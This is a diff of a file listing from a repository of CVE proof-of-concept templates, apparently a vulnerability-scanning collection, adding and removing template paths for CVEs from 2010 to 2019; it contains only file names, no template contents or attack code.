./poc/cve/cve-2010-1719-1799.yaml
@@ -37652,7 +37628,6 @@
./poc/cve/cve-2010-1858-1814.yaml
./poc/cve/cve-2010-1858-1815.yaml
./poc/cve/cve-2010-1858-1816.yaml
-./poc/cve/cve-2010-1858.yaml
./poc/cve/cve-2010-1870-1817.yaml
./poc/cve/cve-2010-1870-1818.yaml
./poc/cve/cve-2010-1870-1819.yaml
@@ -37676,6 +37651,7 @@
./poc/cve/cve-2010-1952-1838.yaml
./poc/cve/cve-2010-1952-1839.yaml
./poc/cve/cve-2010-1953-1840.yaml
+./poc/cve/cve-2010-1953-1841.yaml
./poc/cve/cve-2010-1953-1842.yaml
./poc/cve/cve-2010-1953-1843.yaml
./poc/cve/cve-2010-1954-1844.yaml
@@ -37717,12 +37693,14 @@
./poc/cve/cve-2010-1981-1880.yaml
./poc/cve/cve-2010-1981-1881.yaml
./poc/cve/cve-2010-1981-1882.yaml
+./poc/cve/cve-2010-1981.yaml
./poc/cve/cve-2010-1982-1883.yaml
./poc/cve/cve-2010-1982-1884.yaml
./poc/cve/cve-2010-1982-1885.yaml
./poc/cve/cve-2010-1982-1886.yaml
./poc/cve/cve-2010-1982-1887.yaml
./poc/cve/cve-2010-1982-1888.yaml
+./poc/cve/cve-2010-1982.yaml
./poc/cve/cve-2010-1983-1889.yaml
./poc/cve/cve-2010-1983-1890.yaml
./poc/cve/cve-2010-1983-1891.yaml
@@ -37794,6 +37772,7 @@
./poc/cve/cve-2010-2680-1958.yaml
./poc/cve/cve-2010-2680-1959.yaml
./poc/cve/cve-2010-2680.yaml
+./poc/cve/cve-2010-2682-1960.yaml
./poc/cve/cve-2010-2682-1961.yaml
./poc/cve/cve-2010-2682-1962.yaml
./poc/cve/cve-2010-2682-1963.yaml
@@ -37817,11 +37796,12 @@
./poc/cve/cve-2010-2920-1981.yaml
./poc/cve/cve-2010-2920-1982.yaml
./poc/cve/cve-2010-2920-1983.yaml
-./poc/cve/cve-2010-2920.yaml
./poc/cve/cve-2010-3203-1984.yaml
./poc/cve/cve-2010-3203-1985.yaml
./poc/cve/cve-2010-3203-1986.yaml
+./poc/cve/cve-2010-3203-1987.yaml
./poc/cve/cve-2010-3203-1988.yaml
+./poc/cve/cve-2010-3203.yaml
./poc/cve/cve-2010-3426-1989.yaml
./poc/cve/cve-2010-3426-1990.yaml
./poc/cve/cve-2010-3426-1991.yaml
@@ -37830,7 +37810,6 @@
./poc/cve/cve-2010-4231-1994.yaml
./poc/cve/cve-2010-4231-1995.yaml
./poc/cve/cve-2010-4231-1996.yaml
-./poc/cve/cve-2010-4239-1997.yaml
./poc/cve/cve-2010-4239-1998.yaml
./poc/cve/cve-2010-4282-1999.yaml
./poc/cve/cve-2010-4282-2000.yaml
@@ -37840,7 +37819,6 @@
./poc/cve/cve-2010-4617-2004.yaml
./poc/cve/cve-2010-4617-2005.yaml
./poc/cve/cve-2010-4617-2006.yaml
-./poc/cve/cve-2010-4617.yaml
./poc/cve/cve-2010-4719-2007.yaml
./poc/cve/cve-2010-4719-2008.yaml
./poc/cve/cve-2010-4719-2009.yaml
@@ -37857,10 +37835,13 @@
./poc/cve/cve-2010-5028-2022.yaml
./poc/cve/cve-2010-5028-2023.yaml
./poc/cve/cve-2010-5028-2024.yaml
+./poc/cve/cve-2010-5028-2025.yaml
./poc/cve/cve-2010-5278-2026.yaml
./poc/cve/cve-2010-5278-2027.yaml
./poc/cve/cve-2010-5278-2028.yaml
./poc/cve/cve-2010-5278-2029.yaml
+./poc/cve/cve-2010-5278-2030.yaml
+./poc/cve/cve-2010-5278.yaml
./poc/cve/cve-2010-5286-2031.yaml
./poc/cve/cve-2010-5286-2032.yaml
./poc/cve/cve-2010-5286-2033.yaml
@@ -37880,14 +37861,12 @@
./poc/cve/cve-2011-2744-2049.yaml
./poc/cve/cve-2011-2744-2050.yaml
./poc/cve/cve-2011-2744-2051.yaml
-./poc/cve/cve-2011-2744.yaml
./poc/cve/cve-2011-2780-2052.yaml
./poc/cve/cve-2011-2780-2053.yaml
./poc/cve/cve-2011-2780-2054.yaml
./poc/cve/cve-2011-2780-2055.yaml
./poc/cve/cve-2011-2780-2056.yaml
./poc/cve/cve-2011-3315-2058.yaml
-./poc/cve/cve-2011-3315-2059.yaml
./poc/cve/cve-2011-3315-2060.yaml
./poc/cve/cve-2011-3315-2061.yaml
./poc/cve/cve-2011-4336-2062.yaml
@@ -37922,6 +37901,7 @@
./poc/cve/cve-2011-4926-2090.yaml
./poc/cve/cve-2011-4926-2091.yaml
./poc/cve/cve-2011-4926-2092.yaml
+./poc/cve/cve-2011-4926.yaml
./poc/cve/cve-2011-4969.yaml
./poc/cve/cve-2011-5106-2093.yaml
./poc/cve/cve-2011-5106-2094.yaml
@@ -37942,7 +37922,6 @@
./poc/cve/cve-2011-5179-2109.yaml
./poc/cve/cve-2011-5179-2110.yaml
./poc/cve/cve-2011-5179-2111.yaml
-./poc/cve/cve-2011-5179.yaml
./poc/cve/cve-2011-5181-2112.yaml
./poc/cve/cve-2011-5181-2113.yaml
./poc/cve/cve-2011-5181-2114.yaml
@@ -37964,7 +37943,6 @@
./poc/cve/cve-2012-0392-2129.yaml
./poc/cve/cve-2012-0392-2130.yaml
./poc/cve/cve-2012-0392-2131.yaml
-./poc/cve/cve-2012-0896-2132.yaml
./poc/cve/cve-2012-0896-2133.yaml
./poc/cve/cve-2012-0896-2134.yaml
./poc/cve/cve-2012-0896-2135.yaml
@@ -37980,6 +37958,7 @@
./poc/cve/cve-2012-0981-2145.yaml
./poc/cve/cve-2012-0981-2146.yaml
./poc/cve/cve-2012-0981-2147.yaml
+./poc/cve/cve-2012-0981.yaml
./poc/cve/cve-2012-0991-2148.yaml
./poc/cve/cve-2012-0991-2149.yaml
./poc/cve/cve-2012-0991-2150.yaml
@@ -38010,6 +37989,7 @@
./poc/cve/cve-2012-2371-2177.yaml
./poc/cve/cve-2012-2371-2178.yaml
./poc/cve/cve-2012-2371-2179.yaml
+./poc/cve/cve-2012-2371.yaml
./poc/cve/cve-2012-3153-2180.yaml
./poc/cve/cve-2012-3153-2181.yaml
./poc/cve/cve-2012-3153-2182.yaml
@@ -38030,6 +38010,7 @@
./poc/cve/cve-2012-4273-2195.yaml
./poc/cve/cve-2012-4273-2196.yaml
./poc/cve/cve-2012-4273-2197.yaml
+./poc/cve/cve-2012-4273-2198.yaml
./poc/cve/cve-2012-4547-2199.yaml
./poc/cve/cve-2012-4547-2200.yaml
./poc/cve/cve-2012-4547-2201.yaml
@@ -38038,6 +38019,7 @@
./poc/cve/cve-2012-4768-2204.yaml
./poc/cve/cve-2012-4768-2205.yaml
./poc/cve/cve-2012-4768-2206.yaml
+./poc/cve/cve-2012-4768-2207.yaml
./poc/cve/cve-2012-4878-2208.yaml
./poc/cve/cve-2012-4878-2209.yaml
./poc/cve/cve-2012-4878-2210.yaml
@@ -38109,11 +38091,9 @@
./poc/cve/cve-2013-5528-2274.yaml
./poc/cve/cve-2013-5528-2275.yaml
./poc/cve/cve-2013-5528-2276.yaml
-./poc/cve/cve-2013-5528.yaml
./poc/cve/cve-2013-5979-2277.yaml
./poc/cve/cve-2013-5979-2278.yaml
./poc/cve/cve-2013-5979-2279.yaml
-./poc/cve/cve-2013-5979-2280.yaml
./poc/cve/cve-2013-6281-2281.yaml
./poc/cve/cve-2013-7091-2282.yaml
./poc/cve/cve-2013-7091-2283.yaml
@@ -38123,6 +38103,7 @@
./poc/cve/cve-2013-7240-2288.yaml
./poc/cve/cve-2013-7240-2289.yaml
./poc/cve/cve-2013-7240-2290.yaml
+./poc/cve/cve-2013-7240.yaml
./poc/cve/cve-2014-10037-2291.yaml
./poc/cve/cve-2014-10037-2292.yaml
./poc/cve/cve-2014-10037-2293.yaml
@@ -38145,6 +38126,7 @@
./poc/cve/cve-2014-2908-2310.yaml
./poc/cve/cve-2014-2908-2311.yaml
./poc/cve/cve-2014-2962-2312.yaml
+./poc/cve/cve-2014-2962-2313.yaml
./poc/cve/cve-2014-2962-2314.yaml
./poc/cve/cve-2014-2962-2315.yaml
./poc/cve/cve-2014-3120-2316.yaml
@@ -38204,7 +38186,6 @@
./poc/cve/cve-2014-4561-2372.yaml
./poc/cve/cve-2014-4561-2373.yaml
./poc/cve/cve-2014-4561-2374.yaml
-./poc/cve/cve-2014-4561-2375.yaml
./poc/cve/cve-2014-4592-2376.yaml
./poc/cve/cve-2014-4592-2377.yaml
./poc/cve/cve-2014-4592-2378.yaml
@@ -38215,7 +38196,6 @@
./poc/cve/cve-2014-4940-2383.yaml
./poc/cve/cve-2014-4940-2384.yaml
./poc/cve/cve-2014-4940-2385.yaml
-./poc/cve/cve-2014-4940.yaml
./poc/cve/cve-2014-5111-2386.yaml
./poc/cve/cve-2014-5111-2387.yaml
./poc/cve/cve-2014-5111-2388.yaml
@@ -38254,6 +38234,7 @@
./poc/cve/cve-2014-9094-2420.yaml
./poc/cve/cve-2014-9094-2421.yaml
./poc/cve/cve-2014-9094-2422.yaml
+./poc/cve/cve-2014-9094.yaml
./poc/cve/cve-2014-9444-2423.yaml
./poc/cve/cve-2014-9444-2424.yaml
./poc/cve/cve-2014-9444-2425.yaml
@@ -38261,12 +38242,14 @@
./poc/cve/cve-2014-9444-2427.yaml
./poc/cve/cve-2014-9606-2428.yaml
./poc/cve/cve-2014-9606-2429.yaml
+./poc/cve/cve-2014-9606-2430.yaml
./poc/cve/cve-2014-9607-2431.yaml
./poc/cve/cve-2014-9607-2432.yaml
./poc/cve/cve-2014-9607-2433.yaml
./poc/cve/cve-2014-9608-2434.yaml
./poc/cve/cve-2014-9608-2435.yaml
./poc/cve/cve-2014-9608-2436.yaml
+./poc/cve/cve-2014-9609-2437.yaml
./poc/cve/cve-2014-9609-2438.yaml
./poc/cve/cve-2014-9609-2439.yaml
./poc/cve/cve-2014-9614-2440.yaml
@@ -38284,7 +38267,6 @@
./poc/cve/cve-2015-0554-2453.yaml
./poc/cve/cve-2015-0554-2454.yaml
./poc/cve/cve-2015-0554-2455.yaml
-./poc/cve/cve-2015-0554-2456.yaml
./poc/cve/cve-2015-1000012-2457.yaml
./poc/cve/cve-2015-1000012-2458.yaml
./poc/cve/cve-2015-1000012-2459.yaml
@@ -38304,7 +38286,6 @@
./poc/cve/cve-2015-1880-2474.yaml
./poc/cve/cve-2015-1880-2475.yaml
./poc/cve/cve-2015-1880-2476.yaml
-./poc/cve/cve-2015-1880-2477.yaml
./poc/cve/cve-2015-1880-2478.yaml
./poc/cve/cve-2015-2067-2479.yaml
./poc/cve/cve-2015-2067-2480.yaml
@@ -38324,14 +38305,12 @@
./poc/cve/cve-2015-2166-2494.yaml
./poc/cve/cve-2015-2166-2495.yaml
./poc/cve/cve-2015-2166-2496.yaml
-./poc/cve/cve-2015-2166.yaml
./poc/cve/cve-2015-2794.yaml
./poc/cve/cve-2015-2807-2497.yaml
./poc/cve/cve-2015-2807-2498.yaml
./poc/cve/cve-2015-2807-2499.yaml
./poc/cve/cve-2015-2807-2500.yaml
./poc/cve/cve-2015-2807-2501.yaml
-./poc/cve/cve-2015-3306-2502.yaml
./poc/cve/cve-2015-3306-2503.yaml
./poc/cve/cve-2015-3306-2504.yaml
./poc/cve/cve-2015-3306-2505.yaml
@@ -38356,7 +38335,6 @@
./poc/cve/cve-2015-4050-2524.yaml
./poc/cve/cve-2015-4050-2525.yaml
./poc/cve/cve-2015-4050-2526.yaml
-./poc/cve/cve-2015-4050.yaml
./poc/cve/cve-2015-4414-2527.yaml
./poc/cve/cve-2015-4414-2528.yaml
./poc/cve/cve-2015-4414-2529.yaml
@@ -38433,6 +38411,7 @@
./poc/cve/cve-2015-7780-2601.yaml
./poc/cve/cve-2015-7780-2602.yaml
./poc/cve/cve-2015-7780-2603.yaml
+./poc/cve/cve-2015-7780-2604.yaml
./poc/cve/cve-2015-7823-2605.yaml
./poc/cve/cve-2015-7823-2606.yaml
./poc/cve/cve-2015-7823-2607.yaml
@@ -38476,7 +38455,6 @@
./poc/cve/cve-2016-1000128-2648.yaml
./poc/cve/cve-2016-1000128-2649.yaml
./poc/cve/cve-2016-1000128-2650.yaml
-./poc/cve/cve-2016-1000128-2651.yaml
./poc/cve/cve-2016-1000129-2652.yaml
./poc/cve/cve-2016-1000129-2653.yaml
./poc/cve/cve-2016-1000129-2654.yaml
@@ -38494,7 +38472,6 @@
./poc/cve/cve-2016-1000132-2666.yaml
./poc/cve/cve-2016-1000132-2667.yaml
./poc/cve/cve-2016-1000132-2668.yaml
-./poc/cve/cve-2016-1000132-2669.yaml
./poc/cve/cve-2016-1000132-2670.yaml
./poc/cve/cve-2016-1000133-2671.yaml
./poc/cve/cve-2016-1000133-2672.yaml
@@ -38503,7 +38480,6 @@
./poc/cve/cve-2016-1000133-2675.yaml
./poc/cve/cve-2016-1000134-2676.yaml
./poc/cve/cve-2016-1000134-2677.yaml
-./poc/cve/cve-2016-1000134-2678.yaml
./poc/cve/cve-2016-1000134-2679.yaml
./poc/cve/cve-2016-1000134-2680.yaml
./poc/cve/cve-2016-1000135-2681.yaml
@@ -38541,7 +38517,6 @@
./poc/cve/cve-2016-1000142-2714.yaml
./poc/cve/cve-2016-1000143-2715.yaml
./poc/cve/cve-2016-1000143-2716.yaml
-./poc/cve/cve-2016-1000143-2717.yaml
./poc/cve/cve-2016-1000146-2718.yaml
./poc/cve/cve-2016-1000146-2719.yaml
./poc/cve/cve-2016-1000146-2720.yaml
@@ -38564,6 +38539,7 @@
./poc/cve/cve-2016-1000154-2737.yaml
./poc/cve/cve-2016-1000154-2738.yaml
./poc/cve/cve-2016-1000154-2739.yaml
+./poc/cve/cve-2016-1000154-2740.yaml
./poc/cve/cve-2016-1000155-2741.yaml
./poc/cve/cve-2016-1000155-2742.yaml
./poc/cve/cve-2016-1000155-2743.yaml
@@ -38578,7 +38554,6 @@
./poc/cve/cve-2016-10924-2754.yaml
./poc/cve/cve-2016-10924-2755.yaml
./poc/cve/cve-2016-10940-2756.yaml
-./poc/cve/cve-2016-10940-2757.yaml
./poc/cve/cve-2016-10956-2758.yaml
./poc/cve/cve-2016-10956-2759.yaml
./poc/cve/cve-2016-10956-2760.yaml
@@ -38625,7 +38600,6 @@
./poc/cve/cve-2016-5649-2801.yaml
./poc/cve/cve-2016-6210-2802.yaml
./poc/cve/cve-2016-6210-2803.yaml
-./poc/cve/cve-2016-6210.yaml
./poc/cve/cve-2016-6277-2804.yaml
./poc/cve/cve-2016-6277-2806.yaml
./poc/cve/cve-2016-6277-2807.yaml
@@ -38633,7 +38607,6 @@
./poc/cve/cve-2016-7552-2809.yaml
./poc/cve/cve-2016-7552-2810.yaml
./poc/cve/cve-2016-7552-2811.yaml
-./poc/cve/cve-2016-7552-2812.yaml
./poc/cve/cve-2016-7552-2813.yaml
./poc/cve/cve-2016-7981-2814.yaml
./poc/cve/cve-2016-7981-2815.yaml
@@ -38703,6 +38676,7 @@
./poc/cve/cve-2017-12149-2881.yaml
./poc/cve/cve-2017-12149-2882.yaml
./poc/cve/cve-2017-12149-2883.yaml
+./poc/cve/cve-2017-12542-2884.yaml
./poc/cve/cve-2017-12542-2885.yaml
./poc/cve/cve-2017-12542-2886.yaml
./poc/cve/cve-2017-12542-2887.yaml
@@ -38723,7 +38697,6 @@
./poc/cve/cve-2017-12615-2903.yaml
./poc/cve/cve-2017-12615-2904.yaml
./poc/cve/cve-2017-12615-2905.yaml
-./poc/cve/cve-2017-12615.yaml
./poc/cve/cve-2017-12629-2906.yaml
./poc/cve/cve-2017-12629-2907.yaml
./poc/cve/cve-2017-12629-2908.yaml
@@ -38746,7 +38719,6 @@
./poc/cve/cve-2017-14135-2925.yaml
./poc/cve/cve-2017-14135-2926.yaml
./poc/cve/cve-2017-14535-2927.yaml
-./poc/cve/cve-2017-14535-2928.yaml
./poc/cve/cve-2017-14535-2929.yaml
./poc/cve/cve-2017-14535-2930.yaml
./poc/cve/cve-2017-14535-2931.yaml
@@ -38772,7 +38744,6 @@
./poc/cve/cve-2017-15647-2952.yaml
./poc/cve/cve-2017-15647-2953.yaml
./poc/cve/cve-2017-15647-2954.yaml
-./poc/cve/cve-2017-15647-2955.yaml
./poc/cve/cve-2017-15647-2956.yaml
./poc/cve/cve-2017-15715-2957.yaml
./poc/cve/cve-2017-15715-2958.yaml
@@ -38782,6 +38753,7 @@
./poc/cve/cve-2017-15715-2962.yaml
./poc/cve/cve-2017-15944-2963.yaml
./poc/cve/cve-2017-15944-2964.yaml
+./poc/cve/cve-2017-15944-2965.yaml
./poc/cve/cve-2017-16806-2966.yaml
./poc/cve/cve-2017-16806-2967.yaml
./poc/cve/cve-2017-16806-2968.yaml
@@ -38798,7 +38770,6 @@
./poc/cve/cve-2017-17059-2980.yaml
./poc/cve/cve-2017-17451-2981.yaml
./poc/cve/cve-2017-17451-2982.yaml
-./poc/cve/cve-2017-17451-2983.yaml
./poc/cve/cve-2017-17562-2984.yaml
./poc/cve/cve-2017-17562-2985.yaml
./poc/cve/cve-2017-17562-2986.yaml
@@ -38811,7 +38782,6 @@
./poc/cve/cve-2017-18024-2992.yaml
./poc/cve/cve-2017-18536-2993.yaml
./poc/cve/cve-2017-18536-2994.yaml
-./poc/cve/cve-2017-18536-2995.yaml
./poc/cve/cve-2017-18598-2996.yaml
./poc/cve/cve-2017-18598-2997.yaml
./poc/cve/cve-2017-18638-2998.yaml
@@ -38827,7 +38797,6 @@
./poc/cve/cve-2017-3528-3009.yaml
./poc/cve/cve-2017-3528-3010.yaml
./poc/cve/cve-2017-3528-3011.yaml
-./poc/cve/cve-2017-3528-3012.yaml
./poc/cve/cve-2017-3528-3013.yaml
./poc/cve/cve-2017-3881-3014.yaml
./poc/cve/cve-2017-3881-3015.yaml
@@ -38840,12 +38809,13 @@
./poc/cve/cve-2017-5487-3022.yaml
./poc/cve/cve-2017-5487-3023.yaml
./poc/cve/cve-2017-5487-3024.yaml
-./poc/cve/cve-2017-5487.yaml
./poc/cve/cve-2017-5521-3025.yaml
./poc/cve/cve-2017-5521-3026.yaml
+./poc/cve/cve-2017-5521-3027.yaml
./poc/cve/cve-2017-5521-3028.yaml
./poc/cve/cve-2017-5521-3029.yaml
./poc/cve/cve-2017-5631-3030.yaml
+./poc/cve/cve-2017-5631-3031.yaml
./poc/cve/cve-2017-5638-3032.yaml
./poc/cve/cve-2017-5638-3033.yaml
./poc/cve/cve-2017-5638-3034.yaml
@@ -38858,7 +38828,6 @@
./poc/cve/cve-2017-5982-3041.yaml
./poc/cve/cve-2017-5982-3042.yaml
./poc/cve/cve-2017-6090-3043.yaml
-./poc/cve/cve-2017-6090-3044.yaml
./poc/cve/cve-2017-6090-3045.yaml
./poc/cve/cve-2017-6090-3046.yaml
./poc/cve/cve-2017-6360-3047.yaml
@@ -38876,7 +38845,6 @@
./poc/cve/cve-2017-7391-3060.yaml
./poc/cve/cve-2017-7391-3061.yaml
./poc/cve/cve-2017-7391-3062.yaml
-./poc/cve/cve-2017-7391.yaml
./poc/cve/cve-2017-7529-3063.yaml
./poc/cve/cve-2017-7529-3064.yaml
./poc/cve/cve-2017-7529-3065.yaml
@@ -38892,6 +38860,7 @@
./poc/cve/cve-2017-8917-3075.yaml
./poc/cve/cve-2017-8917-3076.yaml
./poc/cve/cve-2017-8917-3077.yaml
+./poc/cve/cve-2017-8917-3078.yaml
./poc/cve/cve-2017-8917-3079.yaml
./poc/cve/cve-2017-9140-3080.yaml
./poc/cve/cve-2017-9140-3081.yaml
@@ -38916,7 +38885,9 @@
./poc/cve/cve-2017-9805-3101.yaml
./poc/cve/cve-2017-9805-3102.yaml
./poc/cve/cve-2017-9805-3103.yaml
+./poc/cve/cve-2017-9805-3104.yaml
./poc/cve/cve-2017-9805-3105.yaml
+./poc/cve/cve-2017-9822-3106.yaml
./poc/cve/cve-2017-9822-3107.yaml
./poc/cve/cve-2017-9822-3108.yaml
./poc/cve/cve-2017-9822-3109.yaml
@@ -38944,12 +38915,12 @@
./poc/cve/cve-2018-1000129-3131.yaml
./poc/cve/cve-2018-1000129-3132.yaml
./poc/cve/cve-2018-1000129-3133.yaml
+./poc/cve/cve-2018-1000129.yaml
./poc/cve/cve-2018-1000130-3134.yaml
./poc/cve/cve-2018-1000130-3135.yaml
./poc/cve/cve-2018-1000130-3136.yaml
./poc/cve/cve-2018-1000130-3137.yaml
./poc/cve/cve-2018-1000226-3138.yaml
-./poc/cve/cve-2018-1000226-3139.yaml
./poc/cve/cve-2018-1000226-3140.yaml
./poc/cve/cve-2018-1000533-3142.yaml
./poc/cve/cve-2018-1000533-3143.yaml
@@ -38979,7 +38950,6 @@
./poc/cve/cve-2018-10562-3168.yaml
./poc/cve/cve-2018-10562-3169.yaml
./poc/cve/cve-2018-10562-3170.yaml
-./poc/cve/cve-2018-10818-3171.yaml
./poc/cve/cve-2018-10818-3172.yaml
./poc/cve/cve-2018-10818-3173.yaml
./poc/cve/cve-2018-10818-3174.yaml
@@ -39004,6 +38974,7 @@
./poc/cve/cve-2018-11409-3193.yaml
./poc/cve/cve-2018-11409-3194.yaml
./poc/cve/cve-2018-11409-3195.yaml
+./poc/cve/cve-2018-11409.yaml
./poc/cve/cve-2018-11709-3196.yaml
./poc/cve/cve-2018-11709-3197.yaml
./poc/cve/cve-2018-11709-3198.yaml
@@ -39110,7 +39081,6 @@
./poc/cve/cve-2018-14013-3298.yaml
./poc/cve/cve-2018-14064-3299.yaml
./poc/cve/cve-2018-14064-3300.yaml
-./poc/cve/cve-2018-14064-3301.yaml
./poc/cve/cve-2018-14474-3302.yaml
./poc/cve/cve-2018-14474-3303.yaml
./poc/cve/cve-2018-14574-3304.yaml
@@ -39124,8 +39094,6 @@
./poc/cve/cve-2018-14728-3312.yaml
./poc/cve/cve-2018-14728-3313.yaml
./poc/cve/cve-2018-14728-3314.yaml
-./poc/cve/cve-2018-14728.yaml
-./poc/cve/cve-2018-14912-3315.yaml
./poc/cve/cve-2018-14912-3316.yaml
./poc/cve/cve-2018-14912-3317.yaml
./poc/cve/cve-2018-14916-3318.yaml
@@ -39138,7 +39106,6 @@
./poc/cve/cve-2018-15138-3327.yaml
./poc/cve/cve-2018-15138-3328.yaml
./poc/cve/cve-2018-15473-3330.yaml
-./poc/cve/cve-2018-15517-3331.yaml
./poc/cve/cve-2018-15517-3332.yaml
./poc/cve/cve-2018-15517-3333.yaml
./poc/cve/cve-2018-15517-3334.yaml
@@ -39164,12 +39131,13 @@
./poc/cve/cve-2018-16133-3355.yaml
./poc/cve/cve-2018-16133-3356.yaml
./poc/cve/cve-2018-16133-3357.yaml
-./poc/cve/cve-2018-16133-3358.yaml
+./poc/cve/cve-2018-16167-3359.yaml
./poc/cve/cve-2018-16167-3360.yaml
./poc/cve/cve-2018-16167-3361.yaml
./poc/cve/cve-2018-16283-3362.yaml
./poc/cve/cve-2018-16283-3363.yaml
./poc/cve/cve-2018-16283-3364.yaml
+./poc/cve/cve-2018-16288-3365.yaml
./poc/cve/cve-2018-16288-3366.yaml
./poc/cve/cve-2018-16288-3367.yaml
./poc/cve/cve-2018-16288-3368.yaml
@@ -39225,8 +39193,8 @@
./poc/cve/cve-2018-17254-3418.yaml
./poc/cve/cve-2018-17422-3419.yaml
./poc/cve/cve-2018-17422-3420.yaml
-./poc/cve/cve-2018-17422-3421.yaml
./poc/cve/cve-2018-17431-3422.yaml
+./poc/cve/cve-2018-17431-3423.yaml
./poc/cve/cve-2018-17431-3424.yaml
./poc/cve/cve-2018-18069-3425.yaml
./poc/cve/cve-2018-18069-3426.yaml
@@ -39275,7 +39243,6 @@
./poc/cve/cve-2018-19386-3471.yaml
./poc/cve/cve-2018-19386-3472.yaml
./poc/cve/cve-2018-19386-3473.yaml
-./poc/cve/cve-2018-19386.yaml
./poc/cve/cve-2018-19439-3474.yaml
./poc/cve/cve-2018-19439-3475.yaml
./poc/cve/cve-2018-19439-3476.yaml
@@ -39287,14 +39254,12 @@
./poc/cve/cve-2018-19458-3483.yaml
./poc/cve/cve-2018-19458-3484.yaml
./poc/cve/cve-2018-19458-3485.yaml
-./poc/cve/cve-2018-19752(1).yaml
./poc/cve/cve-2018-19753-3486.yaml
./poc/cve/cve-2018-19753-3487.yaml
./poc/cve/cve-2018-19753-3488.yaml
-./poc/cve/cve-2018-19877(1).yaml
./poc/cve/cve-2018-19892(1).yaml
./poc/cve/cve-2018-20009(1).yaml
-./poc/cve/cve-2018-20010(1).yaml
+./poc/cve/cve-2018-20011(1).yaml
./poc/cve/cve-2018-20062-3489.yaml
./poc/cve/cve-2018-20062-3490.yaml
./poc/cve/cve-2018-20062-3491.yaml
@@ -39303,7 +39268,6 @@
./poc/cve/cve-2018-20462-3494.yaml
./poc/cve/cve-2018-20470-3495.yaml
./poc/cve/cve-2018-20470-3496.yaml
-./poc/cve/cve-2018-20470-3497.yaml
./poc/cve/cve-2018-20470-3498.yaml
./poc/cve/cve-2018-20824-3499.yaml
./poc/cve/cve-2018-20824-3500.yaml
@@ -39313,7 +39277,6 @@
./poc/cve/cve-2018-20824-3504.yaml
./poc/cve/cve-2018-20985-3505.yaml
./poc/cve/cve-2018-20985-3506.yaml
-./poc/cve/cve-2018-20985-3507.yaml
./poc/cve/cve-2018-2392-3508.yaml
./poc/cve/cve-2018-2392-3509.yaml
./poc/cve/cve-2018-2392-3510.yaml
@@ -39341,7 +39304,6 @@
./poc/cve/cve-2018-3167-3534.yaml
./poc/cve/cve-2018-3167-3535.yaml
./poc/cve/cve-2018-3167-3536.yaml
-./poc/cve/cve-2018-3167.yaml
./poc/cve/cve-2018-3238-1.yaml
./poc/cve/cve-2018-3238-2.yaml
./poc/cve/cve-2018-3238-3.yaml
@@ -39374,25 +39336,24 @@
./poc/cve/cve-2018-5230-3564.yaml
./poc/cve/cve-2018-5233-3565.yaml
./poc/cve/cve-2018-5233-3566.yaml
-./poc/cve/cve-2018-5233-3567.yaml
./poc/cve/cve-2018-5316-3568.yaml
./poc/cve/cve-2018-5316-3569.yaml
./poc/cve/cve-2018-5316-3570.yaml
./poc/cve/cve-2018-6008-3571.yaml
./poc/cve/cve-2018-6008-3572.yaml
./poc/cve/cve-2018-6008-3573.yaml
+./poc/cve/cve-2018-6008-3574.yaml
./poc/cve/cve-2018-6008-3575.yaml
./poc/cve/cve-2018-6200-3576.yaml
./poc/cve/cve-2018-6200-3577.yaml
-./poc/cve/cve-2018-6200-3578.yaml
./poc/cve/cve-2018-6389-3579.yaml
./poc/cve/cve-2018-6389-3580.yaml
./poc/cve/cve-2018-6389-3581.yaml
./poc/cve/cve-2018-6910-3582.yaml
./poc/cve/cve-2018-6910-3583.yaml
./poc/cve/cve-2018-6910-3584.yaml
+./poc/cve/cve-2018-6910-3585.yaml
./poc/cve/cve-2018-6910-3586.yaml
-./poc/cve/cve-2018-7251-3587.yaml
./poc/cve/cve-2018-7251-3588.yaml
./poc/cve/cve-2018-7251-3589.yaml
./poc/cve/cve-2018-7251-3590.yaml
@@ -39403,6 +39364,7 @@
./poc/cve/cve-2018-7422-3595.yaml
./poc/cve/cve-2018-7422-3596.yaml
./poc/cve/cve-2018-7467-3597.yaml
+./poc/cve/cve-2018-7467-3598.yaml
./poc/cve/cve-2018-7467-3599.yaml
./poc/cve/cve-2018-7467-3600.yaml
./poc/cve/cve-2018-7490-3601.yaml
@@ -39422,6 +39384,7 @@
./poc/cve/cve-2018-7602-3615.yaml
./poc/cve/cve-2018-7662-3616.yaml
./poc/cve/cve-2018-7662-3617.yaml
+./poc/cve/cve-2018-7700-3618.yaml
./poc/cve/cve-2018-7700-3619.yaml
./poc/cve/cve-2018-7700-3620.yaml
./poc/cve/cve-2018-7700-3621.yaml
@@ -39456,7 +39419,6 @@
./poc/cve/cve-2018-9118-3651.yaml
./poc/cve/cve-2018-9118-3652.yaml
./poc/cve/cve-2018-9118-3653.yaml
-./poc/cve/cve-2018-9118-3654.yaml
./poc/cve/cve-2018-9126-3655.yaml
./poc/cve/cve-2018-9126-3656.yaml
./poc/cve/cve-2018-9126-3657.yaml
@@ -39472,6 +39434,7 @@
./poc/cve/cve-2018-9995-3667.yaml
./poc/cve/cve-2018-9995-3668.yaml
./poc/cve/cve-2018-9995-3669.yaml
+./poc/cve/cve-2018–14064(1).yaml
./poc/cve/cve-2019-0193-3670.yaml
./poc/cve/cve-2019-0193-3671.yaml
./poc/cve/cve-2019-0193-3672.yaml
@@ -39498,6 +39461,7 @@
./poc/cve/cve-2019-10092-3693.yaml
./poc/cve/cve-2019-1010287-3694.yaml
./poc/cve/cve-2019-1010287-3695.yaml
+./poc/cve/cve-2019-1010287-3696.yaml
./poc/cve/cve-2019-1010287-3697.yaml
./poc/cve/cve-2019-1010287-3698.yaml
./poc/cve/cve-2019-1010290-3699.yaml
@@ -39516,10 +39480,12 @@
./poc/cve/cve-2019-10475-3712.yaml
./poc/cve/cve-2019-10475-3713.yaml
./poc/cve/cve-2019-10475-3714.yaml
+./poc/cve/cve-2019-10692(1).yaml
./poc/cve/cve-2019-10758-3715.yaml
./poc/cve/cve-2019-10758-3716.yaml
./poc/cve/cve-2019-10758-3717.yaml
./poc/cve/cve-2019-10758-3718.yaml
+./poc/cve/cve-2019-11013-3719.yaml
./poc/cve/cve-2019-11013-3720.yaml
./poc/cve/cve-2019-11013-3721.yaml
./poc/cve/cve-2019-11013-3722.yaml
@@ -39531,11 +39497,9 @@
./poc/cve/cve-2019-11248-3728.yaml
./poc/cve/cve-2019-11248-3729.yaml
./poc/cve/cve-2019-11248-3730.yaml
-./poc/cve/cve-2019-11248-3731.yaml
./poc/cve/cve-2019-11248-3732.yaml
./poc/cve/cve-2019-11248-3733.yaml
./poc/cve/cve-2019-11248-3734.yaml
-./poc/cve/cve-2019-11370(1).yaml
./poc/cve/cve-2019-11510-3735.yaml
